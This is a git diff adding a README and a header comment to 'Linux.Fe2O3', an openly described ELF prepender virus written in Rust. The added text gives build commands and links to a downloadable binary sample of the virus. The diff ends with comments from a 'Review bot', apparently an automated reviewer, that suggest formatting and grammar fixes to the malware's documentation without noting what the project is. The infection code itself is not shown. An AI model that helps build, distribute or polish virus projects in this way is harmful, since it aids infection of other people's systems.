diff --git a/README.md b/README.md index 7c223f9..8b72e54 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,24 @@ -# Fe2O3 -Simple prepender virus written in Rust +# Linux.Fe2O3 + +This is a POC ELF prepender written in Rust. I like writting prependers on languages that I'm learning and find interesting. + +# Build +```$ cd src +$ rustc main.rs -o Linux.Fe2O3 +``` + +Note that the Rust version used is `rustc 1.37.0 (eae3437df 2019-08-13)`, the latest at this moment. + +# Binary Sample +A binary sample is also available at https://www.guitmz.com/Linux.Fe2O3 + +``` +$ file Linux.Fe2O3 +Linux.Fe2O3: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, with debug_info, not stripped + +$ sha1sum Linux.Fe2O3 +c185ab0fd9b1c8f3ddaed7079898383edbcbb7f7 Linux.Fe2O3 +``` + +# Demo +[![asciicast](https://asciinema.org/a/gMwAoQozAKpX851zXE8DncDSc.png)](https://asciinema.org/a/gMwAoQozAKpX851zXE8DncDSc) diff --git a/src/main.rs b/src/main.rs index 4baf3b6..1fd5f5e 100644 --- a/src/main.rs +++ b/src/main.rs 
@@ -1,3 +1,26 @@ +/* + This is a ELF prepender written in Rust by TMZ (2019). + I like writting prependers on languages that I'm learning and find interesting. + + Linux.Fe2O3 (September 2019) - Simple binary infector written in Rust. + This version encrypts the host code with a simple XOR and decrypts it at runtime. + It's almost a direct port from my Nim infector Linux.Cephei and Go infector Linux.Liora. + + Build with: rustc main.rs -o Linux.Fe2O3 + + Note that Rust version used was rustc 1.37.0 (eae3437df 2019-08-13). + It has no external dependencies so it should compile under most systems (tested under x86_64). + It's also possible to adapt it to be a PE/Mach infector and compile under Windows/macOS. + + Use at your own risk, I'm not responsible for any damages that this may cause. + A big shout for those who keeps the scene alive! + + Feel free to email me: thomazi@linux.com || guilherme@guitmz.com + You can also find me at Twitter @TMZvx || @guitmz + + https://www.guitmz.com +*/ + use std::ffi::{OsStr, OsString}; use std::fs::File; use std::io::prelude::*;
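Review bot: in the README.md hunk, the Build block's opening fence carries the first command on the same line (three backticks immediately followed by `$ cd src`), so Markdown renderers will treat that text as the fence's info string and the rendered block will show only the `rustc` line. Put the fence on its own line and start the commands on the next one. Also, "writting" in the intro sentence should be "writing", and since the version note says "the latest at this moment", consider adding the date so the statement still makes sense later.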
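Review bot: in the src/main.rs hunk, the new header comment repeats the build command and the pinned `rustc 1.37.0 (eae3437df 2019-08-13)` version that this same patch adds to README.md, so the two copies can drift apart; keep them in one place and point to it from the other. The comment also says this version XOR-encrypts the host code and decrypts it at runtime, which the README added here does not mention, so the two descriptions should be brought in line. Minor wording: "This is a ELF prepender" should be "an ELF prepender", "writting" should be "writing", and "those who keeps" should be "those who keep".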